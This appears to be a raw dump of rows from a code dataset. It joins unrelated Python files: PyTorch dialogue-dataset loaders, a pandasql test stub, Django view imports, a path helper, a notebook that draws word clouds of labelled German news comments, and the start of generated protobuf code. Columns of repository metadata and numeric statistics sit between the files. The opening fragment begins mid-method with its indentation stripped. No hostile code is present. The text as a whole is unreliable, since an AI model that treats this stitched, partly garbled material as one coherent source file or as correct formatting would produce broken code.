else:
current_emotion_id = None
if self.with_current_da:
current_da_id = torch.tensor(
[torch.tensor(instance["current_da_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
else:
current_da_id = None
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, emotion_ids, da_ids, current_speaker_id, current_persona_ids, current_emotion_id, current_da_id, labels
def build_cped_dataloaders(args, tokenizer, logger, load_test=False):
    """Build CPED DataLoaders.

    With ``load_test`` False, returns (train_loader, valid_loader,
    train_sampler, valid_sampler); otherwise returns
    (test_loader, test_sampler). Samplers are DistributedSampler instances
    when ``args.distributed`` is set, else None.
    """
    persona = ["Gender", "Neuroticism", "Extraversion", "Openness",
               "Agreeableness", "Conscientiousness"]

    def make_dataset(data):
        # All splits share the same dataset configuration.
        return CPEDDataset(data=data,
                           tokenizer=tokenizer,
                           emotion_type=args.emotion_type,
                           da_type=args.da_type,
                           persona_type=persona,
                           max_history=args.max_history,
                           batch_first=True,
                           lm_labels=True,
                           with_current_speaker=args.with_current_speaker,
                           with_current_persona=args.with_current_persona,
                           with_current_emotion=args.with_current_emotion,
                           with_current_da=args.with_current_da,
                           with_emotion=args.with_emotion,
                           with_da=args.with_da)

    def make_sampler(dataset):
        if args.distributed:
            return torch.utils.data.distributed.DistributedSampler(dataset)
        return None

    if load_test == False:
        logger.info("Build train and validation dataloaders")
        train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
        valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
        train_dataset = make_dataset(train_data)
        valid_dataset = make_dataset(valid_data)
        train_sampler = make_sampler(train_dataset)
        valid_sampler = make_sampler(valid_dataset)
        train_loader = DataLoader(train_dataset,
                                  sampler=train_sampler,
                                  collate_fn=train_dataset.collate,
                                  num_workers=args.num_workers,
                                  batch_size=args.train_batch_size,
                                  shuffle=(not args.distributed))
        valid_loader = DataLoader(valid_dataset,
                                  sampler=valid_sampler,
                                  collate_fn=valid_dataset.collate,
                                  num_workers=args.num_workers,
                                  batch_size=args.valid_batch_size,
                                  shuffle=False)
        return train_loader, valid_loader, train_sampler, valid_sampler
    else:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = make_dataset(test_data)
        test_sampler = make_sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler
def build_rdadial_dataloaders(args, tokenizer, logger, load_test=False):
    """Build RDADIAL DataLoaders.

    With ``load_test`` False, returns (train_loader, valid_loader,
    train_sampler, valid_sampler); otherwise returns
    (test_loader, test_sampler). Samplers are DistributedSampler instances
    when ``args.distributed`` is set, else None.
    """
    def make_dataset(data):
        # All splits share the same dataset configuration.
        return RDADIALDataset(data=data,
                              tokenizer=tokenizer,
                              da_type=args.da_type,
                              max_history=args.max_history,
                              batch_first=True,
                              lm_labels=True,
                              with_emotion=args.with_emotion,
                              with_da=args.with_da)

    def make_sampler(dataset):
        if args.distributed:
            return torch.utils.data.distributed.DistributedSampler(dataset)
        return None

    if load_test == False:
        logger.info("Build train and validation dataloaders")
        train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
        valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)
        train_dataset = make_dataset(train_data)
        valid_dataset = make_dataset(valid_data)
        train_sampler = make_sampler(train_dataset)
        valid_sampler = make_sampler(valid_dataset)
        train_loader = DataLoader(train_dataset,
                                  sampler=train_sampler,
                                  collate_fn=train_dataset.collate,
                                  num_workers=args.num_workers,
                                  batch_size=args.train_batch_size,
                                  shuffle=(not args.distributed))
        valid_loader = DataLoader(valid_dataset,
                                  sampler=valid_sampler,
                                  collate_fn=valid_dataset.collate,
                                  num_workers=args.num_workers,
                                  batch_size=args.valid_batch_size,
                                  shuffle=False)
        return train_loader, valid_loader, train_sampler, valid_sampler
    else:
        logger.info("Build test dataloaders")
        test_data, test_samples = get_data(args, tokenizer, args.test_path, logger)
        test_dataset = make_dataset(test_data)
        test_sampler = make_sampler(test_dataset)
        test_loader = DataLoader(test_dataset,
                                 sampler=test_sampler,
                                 collate_fn=test_dataset.collate,
                                 num_workers=args.num_workers,
                                 batch_size=args.test_batch_size,
                                 shuffle=False)
        return test_loader, test_sampler
class BERTEDADataset(Dataset):
    """Utterance-level dataset for training BertEDARC.

    Each sample is a single tokenized utterance, optionally paired with
    its emotion and dialogue-act label ids.
    """
    def __init__(self,
                 data,
                 tokenizer,
                 batch_first=True,
                 with_emotion=False,
                 with_da=False):
        self.data = data
        self.tokenizer = tokenizer
        self.with_emotion = with_emotion  # attach emotion labels to instances
        self.with_da = with_da            # attach DA labels to instances
        self.pad = tokenizer.pad_token_id
        self.batch_first = batch_first
        # The unique utterance ids define the sample set.
        self.keys = list(set(self.data['Utterance_ID']))
        self.len = len(self.keys)

    def __len__(self):
        return self.len

    def __getitem__(self, index):
        uid = self.keys[index]
        row = self.data[self.data['Utterance_ID'] == uid]
        tokens = row["Token"].tolist()[0]
        emotion_id = EMOTION_TO_ID[row["Emotion"].tolist()[0]]
        da_id = DA_TO_ID[row["DA"].tolist()[0]]
        return self.process(tokens, emotion_id, da_id)

    def process(self, utterance, emotion, da):
        """Pack one utterance (plus optional labels) into an instance dict."""
        instance = {"input_ids": utterance}
        if self.with_emotion:
            instance["emotion_ids"] = emotion
        if self.with_da:
            instance["da_ids"] = da
        return instance

    def collate(self, batch):
        """Pad input ids and stack optional label tensors for a batch."""
        input_ids = pad_sequence(
            [torch.tensor(item["input_ids"], dtype=torch.long) for item in batch],
            batch_first=self.batch_first, padding_value=self.pad)
        emotion_ids = None
        if self.with_emotion:
            emotion_ids = torch.tensor(
                [torch.tensor(item["emotion_ids"], dtype=torch.long) for item in batch],
                dtype=torch.long)
        da_ids = None
        if self.with_da:
            da_ids = torch.tensor(
                [torch.tensor(item["da_ids"], dtype=torch.long) for item in batch],
                dtype=torch.long)
        return input_ids, emotion_ids, da_ids
def build_berteda_dataloaders(args, tokenizer, logger):
    """Build train/validation DataLoaders for the BERTEDA task.

    Returns (train_loader, valid_loader, train_sampler, valid_sampler);
    samplers are DistributedSampler instances when ``args.distributed``
    is set, else None.
    """
    logger.info("Build train and validation dataloaders")
    train_data, train_samples = get_data(args, tokenizer, args.train_path, logger)
    valid_data, valid_samples = get_data(args, tokenizer, args.valid_path, logger)

    def make_dataset(data):
        # Note: batch_first=False here, unlike the CPED/RDADIAL builders.
        return BERTEDADataset(data=data,
                              tokenizer=tokenizer,
                              batch_first=False,
                              with_emotion=args.with_emotion,
                              with_da=args.with_da)

    def make_sampler(dataset):
        if args.distributed:
            return torch.utils.data.distributed.DistributedSampler(dataset)
        return None

    train_dataset = make_dataset(train_data)
    valid_dataset = make_dataset(valid_data)
    train_sampler = make_sampler(train_dataset)
    valid_sampler = make_sampler(valid_dataset)
    train_loader = DataLoader(train_dataset,
                              sampler=train_sampler,
                              collate_fn=train_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.train_batch_size,
                              shuffle=(not args.distributed))
    valid_loader = DataLoader(valid_dataset,
                              sampler=valid_sampler,
                              collate_fn=valid_dataset.collate,
                              num_workers=args.num_workers,
                              batch_size=args.valid_batch_size,
                              shuffle=False)
    return train_loader, valid_loader, train_sampler, valid_sampler
| 50.96658
| 204
| 0.555281
| 10,637
| 97,601
| 4.814515
| 0.036853
| 0.028568
| 0.023627
| 0.025775
| 0.909025
| 0.895259
| 0.889401
| 0.888054
| 0.887253
| 0.884265
| 0
| 0.025969
| 0.347425
| 97,601
| 1,914
| 205
| 50.993208
| 0.778088
| 0.096884
| 0
| 0.891732
| 0
| 0
| 0.057674
| 0.00154
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048556
| false
| 0
| 0.009186
| 0.004593
| 0.110236
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1568516792be67c400c85d7535dd91fe48a83a0
| 81
|
py
|
Python
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 302
|
2015-01-04T18:21:56.000Z
|
2021-11-16T12:14:37.000Z
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 393
|
2015-01-03T14:35:48.000Z
|
2019-12-09T15:09:07.000Z
|
pandasql/run_test.py
|
Cadair/conda-recipes
|
0227a81ed80e24eefffe091836dead93f8312ffe
|
[
"BSD-3-Clause"
] | 325
|
2015-01-04T17:26:39.000Z
|
2021-11-04T16:25:54.000Z
|
import unittest
import pandasql.tests.tests
unittest.main(pandasql.tests.tests)
| 16.2
| 35
| 0.839506
| 11
| 81
| 6.181818
| 0.454545
| 0.382353
| 0.529412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 81
| 4
| 36
| 20.25
| 0.906667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bee89923c6e8bf3a4902faf93d6d27968cd3e98c
| 132
|
py
|
Python
|
markup/views/__init__.py
|
vmun/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | null | null | null |
markup/views/__init__.py
|
vmun/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | 6
|
2021-03-19T03:58:53.000Z
|
2022-02-10T13:41:23.000Z
|
markup/views/__init__.py
|
vladek1934/SkyMed_Labeling
|
9c1e2268dcdde5a8450e6f70c747902f67980f15
|
[
"MIT"
] | null | null | null |
from .markup_viewsets import *
from .user_viewsets import *
from .path_viewsets import *
from .apiviews import *
from .fbv import *
| 22
| 30
| 0.772727
| 18
| 132
| 5.5
| 0.444444
| 0.40404
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151515
| 132
| 5
| 31
| 26.4
| 0.883929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8306fb8bed0a86b1fe75f3a245de6b42c14fcdc2
| 201
|
py
|
Python
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 3
|
2019-05-04T12:30:00.000Z
|
2020-05-14T06:28:51.000Z
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2019-05-05T01:30:37.000Z
|
2019-05-16T02:50:04.000Z
|
src/svr/tests/context.py
|
yottaawesome/fsnd-project-2
|
7ed478fa945a561a28af06dc8e4492a9fbea510a
|
[
"MIT"
] | 1
|
2020-03-27T07:12:40.000Z
|
2020-03-27T07:12:40.000Z
|
import os
import sys
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../..')))
sys.path.insert(
0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../')))
| 28.714286
| 73
| 0.661692
| 32
| 201
| 3.90625
| 0.3125
| 0.288
| 0.208
| 0.224
| 0.864
| 0.864
| 0.864
| 0.864
| 0.864
| 0.864
| 0
| 0.01105
| 0.099502
| 201
| 6
| 74
| 33.5
| 0.679558
| 0
| 0
| 0.333333
| 0
| 0
| 0.039801
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 12
|
834f9e9feae14dcae0b705a4565e5dc397b42a10
| 13,067
|
py
|
Python
|
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | null | null | null |
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | 95
|
2021-03-26T14:37:37.000Z
|
2021-09-07T08:26:03.000Z
|
notebooks/eda_wordclouds.py
|
dominikmn/one-million-posts
|
a628e88874ca7134a7628d88de169e8520f8deba
|
[
"MIT"
] | 2
|
2021-04-19T15:43:57.000Z
|
2021-04-19T15:57:47.000Z
|
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.1
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %%
from utils import loading, nlp, cleaning, visualizing, feature_engineering
import pandas as pd
from nltk.corpus import stopwords
stopwords=stopwords.words('german')
from string import punctuation
from collections import Counter
import matplotlib.pyplot as plt
# %% tags=[]
df = loading.load_extended_posts()
# %%
df = feature_engineering.add_column_ann_round(df)
# %% [markdown]
# Defining function for top words for labels
# %%
def top_words_label(df, label, text, stop=False, stopwords=None, plot=True, return_list=True, all_plots=True):
df_clean=df.dropna(subset=[label])
df_clean.loc[:,text]=cleaning.strip_punct(df_clean[text])
if stop:
df_clean.loc[:,text]=nlp.strip_stopwords(df_clean[text], stopwords=stopwords)
df_pos = df_clean[df_clean[label]==1]
df_neg = df_clean[df_clean[label]==0]
topwords_pos = feature_engineering.calculate_top_words(df_pos[text], relative=True)
topwords_neg = feature_engineering.calculate_top_words(df_neg[text], relative=True)
topwords_pos_rel = topwords_pos.subtract(topwords_neg, fill_value=0).sort_values(ascending=False)
topwords_neg_rel = (-topwords_pos_rel).sort_values(ascending=False)
if plot and all_plots:
print(f'Order of plots:\nTop left: {label} = positive\nTop right: {label} = negative\nBottom left: {label} = positive, specific\nBottom right: {label} = negative, specific')
plt.figure(figsize = (12, 12))
plt.subplot(2, 2, 1)
visualizing.plot_wordcloud_freq(topwords_pos, colormap='BuGn')
plt.subplot(2, 2, 2)
visualizing.plot_wordcloud_freq(topwords_neg, colormap='RdPu')
plt.subplot(2, 2, 3)
visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='YlGn')
plt.subplot(2, 2, 4)
visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='OrRd')
plt.show()
elif plot and all_plots==False:
plt.figure(figsize=(12,6))
plt.subplot(1, 2, 2)
visualizing.plot_wordcloud_freq(topwords_neg_rel, colormap='binary')
plt.subplot(1, 2, 1)
visualizing.plot_wordcloud_freq(topwords_pos_rel,colormap='RdPu')
plt.show()
if return_list:
return topwords_pos, topwords_neg, topwords_pos_rel, topwords_neg_rel
# %% [markdown]
# # Getting the top words in comments for every label
# %% [markdown]
# ## Arguments used
# %%
arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'body', True, stopwords)
# %% tags=[]
print(f'top words for argument used positive:\n{arg_pos[:10]}')
print(f'top words for argument used negative:\n{arg_neg[:10]}')
print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}')
print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}')
# %% [markdown]
# ## Discriminating
# %%
dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'body', True, stopwords)
# %%
print(f'top words for discriminating positive:\n{dis_pos[:10]}')
print(f'top words for discriminating negative:\n{dis_neg[:10]}')
print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}')
print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}')
# %% [markdown]
# ## Inappropriate
# %%
ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'body', True, stopwords)
# %%
print(f'top words for innapropriate positive:\n{ina_pos[:10]}')
print(f'top words for innapropriate negative:\n{ina_neg[:10]}')
print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}')
print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}')
# %% [markdown]
# ## Off-Topic
# %%
ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'body', True, stopwords)
# %%
print(f'top words for Off-Topic positive:\n{ot_pos[:10]}')
print(f'top words for Off-Topic negative:\n{ot_neg[:10]}')
print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}')
print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}')
# %% [markdown]
# ## Personal stories
# %%
ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'body', True, stopwords)
# %%
print(f'top words for Personal Stories positive:\n{ps_pos[:10]}')
print(f'top words for Personal Stories negative:\n{ps_neg[:10]}')
print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}')
print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}')
# %% [markdown]
# ## Possibly Feedback
# %%
fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords)
# %%
print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}')
print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}')
print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}')
print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}')
# %% [markdown]
# ## Sentiment
# ### Negative
# %%
sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}')
print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}')
print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}')
print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}')
# %% [markdown]
# ### Neutral
# %%
snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}')
print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}')
print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}')
print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}')
# %% [markdown]
# ### Positive
# %%
spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords)
# %%
print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}')
print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}')
print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}')
print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}')
# %% [markdown]
# # Getting the top words in headline for every label
# %% [markdown]
# ## Arguments Used
# %%
arg_pos, arg_neg, arg_pos_rel, arg_neg_rel = top_words_label(df, 'label_argumentsused', 'headline', True, stopwords)
# %% tags=[]
print(f'top words for argument used positive:\n{arg_pos[:10]}')
print(f'top words for argument used negative:\n{arg_neg[:10]}')
print(f'top words for argument used positive specific:\n{arg_pos_rel[:10]}')
print(f'top words for argument used negative specific:\n{arg_neg_rel[:10]}')
# %% [markdown]
# ## Discriminating
# %%
dis_pos, dis_neg, dis_pos_rel, dis_neg_rel = top_words_label(df, 'label_discriminating', 'headline', True, stopwords)
# %%
print(f'top words for discriminating positive:\n{dis_pos[:10]}')
print(f'top words for discriminating negative:\n{dis_neg[:10]}')
print(f'top words for discriminating positive specific:\n{dis_pos_rel[:10]}')
print(f'top words for discriminating negative specific:\n{dis_neg_rel[:10]}')
# %% [markdown]
# ## Inappropriate
# %%
ina_pos, ina_neg, ina_pos_rel, ina_neg_rel = top_words_label(df, 'label_inappropriate', 'headline', True, stopwords)
# %%
print(f'top words for innapropriate positive:\n{ina_pos[:10]}')
print(f'top words for innapropriate negative:\n{ina_neg[:10]}')
print(f'top words for innapropriate positive specific:\n{ina_pos_rel[:10]}')
print(f'top words for innapropriate negative specific:\n{ina_neg_rel[:10]}')
# %% [markdown]
# ## Off-Topic
# %%
ot_pos, ot_neg, ot_pos_rel, ot_neg_rel = top_words_label(df, 'label_offtopic', 'headline', True, stopwords)
# %%
print(f'top words for Off-Topic positive:\n{ot_pos[:10]}')
print(f'top words for Off-Topic negative:\n{ot_neg[:10]}')
print(f'top words for Off-Topic positive specific:\n{ot_pos_rel[:10]}')
print(f'top words for Off-Topic negative specific:\n{ot_neg_rel[:10]}')
# %% [markdown]
# ## Personal stories
# %%
ps_pos, ps_neg, ps_pos_rel, ps_neg_rel = top_words_label(df, 'label_personalstories', 'headline', True, stopwords)
# %%
print(f'top words for Personal Stories positive:\n{ps_pos[:10]}')
print(f'top words for Personal Stories negative:\n{ps_neg[:10]}')
print(f'top words for Personal Stories positive specific:\n{ps_pos_rel[:10]}')
print(f'top words for Personal Stories negative specific:\n{ps_neg_rel[:10]}')
# %% [markdown]
# ## Possibly Feedback
# %%
fb_pos, fb_neg, fb_pos_rel, fb_neg_rel = top_words_label(df, 'label_possiblyfeedback', 'headline', True, stopwords)
# %%
print(f'top words for Possibly Feedback positive:\n{fb_pos[:10]}')
print(f'top words for Possibly Feedback negative:\n{fb_neg[:10]}')
print(f'top words for Possibly Feedback positive specific:\n{fb_pos_rel[:10]}')
print(f'top words for Possibly Feedback negative specific:\n{fb_neg_rel[:10]}')
# %% [markdown]
# ## Sentiment
# ### Negative
# %%
sng_pos, sng_neg, sng_pos_rel, sng_neg_rel = top_words_label(df, 'label_sentimentnegative', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Negative positive:\n{sng_pos[:10]}')
print(f'top words for Sentiment Negative negative:\n{sng_neg[:10]}')
print(f'top words for Sentiment Negative positive specific:\n{sng_pos_rel[:10]}')
print(f'top words for Sentiment Negative negative specific:\n{sng_neg_rel[:10]}')
# %% [markdown]
# ### Neutral
# %%
snt_pos, snt_neg, snt_pos_rel, snt_neg_rel = top_words_label(df, 'label_sentimentneutral', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Neutral positive:\n{snt_pos[:10]}')
print(f'top words for Sentiment Neutral negative:\n{snt_neg[:10]}')
print(f'top words for Sentiment Neutral positive specific:\n{snt_pos_rel[:10]}')
print(f'top words for Sentiment Neutral negative specific:\n{snt_neg_rel[:10]}')
# %% [markdown]
# ### Positive
# %%
spo_pos, spo_neg, spo_pos_rel, spo_neg_rel = top_words_label(df, 'label_sentimentpositive', 'headline', True, stopwords)
# %%
print(f'top words for Sentiment Positive positive:\n{spo_pos[:10]}')
print(f'top words for Sentiment Positive negative:\n{spo_neg[:10]}')
print(f'top words for Sentiment Positive positive specific:\n{spo_pos_rel[:10]}')
print(f'top words for Sentiment Positive negative specific:\n{spo_neg_rel[:10]}')
# %% [markdown]
# ### Wordclouds by annotation round
# %% [markdown]
# ### negative
# %%
top_words_label(df.query('ann_round==2'), 'label_sentimentnegative', 'body', True, stopwords, True, False, False)
plt.savefig('../pictures/wc_negative_round2.png')
# %%
top_words_label(df, 'label_sentimentnegative', 'body', True, stopwords, True, False, False)
plt.savefig('../pictures/wc_negative_all.png')
# %% [markdown]
# ### positive
# %%
top_words_label(df.query('ann_round==2'), 'label_sentimentpositive', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_sentimentpositive', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ### Discriminating
# %%
top_words_label(df.query('ann_round==2'), 'label_discriminating', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_discriminating', 'body', True, stopwords, True, False, False)
# %% [markdown] tags=[]
# ### inappropriate
# %%
top_words_label(df.query('ann_round==2'), 'label_inappropriate', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_inappropriate', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ## Off-Topic
# %%
top_words_label(df.query('ann_round==2'), 'label_offtopic', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_offtopic', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ## Arguments used
# %%
top_words_label(df.query('ann_round==2'), 'label_argumentsused', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_argumentsused', 'body', True, stopwords, True, False, False)
# %% [markdown] tags=[]
# ### Personal stories
# %%
top_words_label(df.query('ann_round==2'), 'label_personalstories', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_personalstories', 'body', True, stopwords, True, False, False)
# %% [markdown]
# ### possibly feedback
# %%
top_words_label(df.query('ann_round==2'), 'label_possiblyfeedback', 'body', True, stopwords, True, False, False)
# %%
top_words_label(df, 'label_possiblyfeedback', 'body', True, stopwords, True, False, False)
# %%
| 34.660477
| 181
| 0.716079
| 1,942
| 13,067
| 4.606591
| 0.086509
| 0.100156
| 0.089761
| 0.112676
| 0.833892
| 0.827409
| 0.813772
| 0.810195
| 0.749385
| 0.687123
| 0
| 0.016548
| 0.125966
| 13,067
| 376
| 182
| 34.75266
| 0.766745
| 0.11288
| 0
| 0.496644
| 0
| 0.006711
| 0.493632
| 0.209486
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006711
| false
| 0
| 0.040268
| 0
| 0.053691
| 0.489933
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
83655339586e826b5dfd8df1c6b544b940af576c
| 88
|
py
|
Python
|
lawliet/handler/__init__.py
|
fastschnell/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | 2
|
2019-05-24T08:50:43.000Z
|
2019-06-28T11:47:29.000Z
|
lawliet/handler/__init__.py
|
fing520/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | null | null | null |
lawliet/handler/__init__.py
|
fing520/Lawliet
|
3a0ed9046d10307ec368259e3c7dca958a7c25cd
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
def json_loads(data):
return json.loads(data)
| 12.571429
| 27
| 0.636364
| 13
| 88
| 4.230769
| 0.692308
| 0.327273
| 0.472727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014085
| 0.193182
| 88
| 6
| 28
| 14.666667
| 0.760563
| 0.238636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
55e48bf5ff32eb255d40903a724fe7ec85c1f653
| 7,027
|
py
|
Python
|
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | 1
|
2020-09-03T23:55:04.000Z
|
2020-09-03T23:55:04.000Z
|
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | null | null | null |
xrd_pb2.py
|
dewitt/webfingerclient-dclinton
|
c13990378c8b0516c84f8507664e0a6ab8eefac5
|
[
"Apache-2.0"
] | null | null | null |
# Generated by the protocol buffer compiler. DO NOT EDIT!
from google.protobuf import descriptor
from google.protobuf import message
from google.protobuf import reflection
from google.protobuf import service
from google.protobuf import service_reflection
from google.protobuf import descriptor_pb2
_XRD = descriptor.Descriptor(
name='Xrd',
full_name='Xrd',
filename='xrd.proto',
containing_type=None,
fields=[
descriptor.FieldDescriptor(
name='id', full_name='Xrd.id', index=0,
number=1, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
name='expires', full_name='Xrd.expires', index=1,
number=2, type=9, cpp_type=9, label=1,
default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
descriptor.FieldDescriptor(
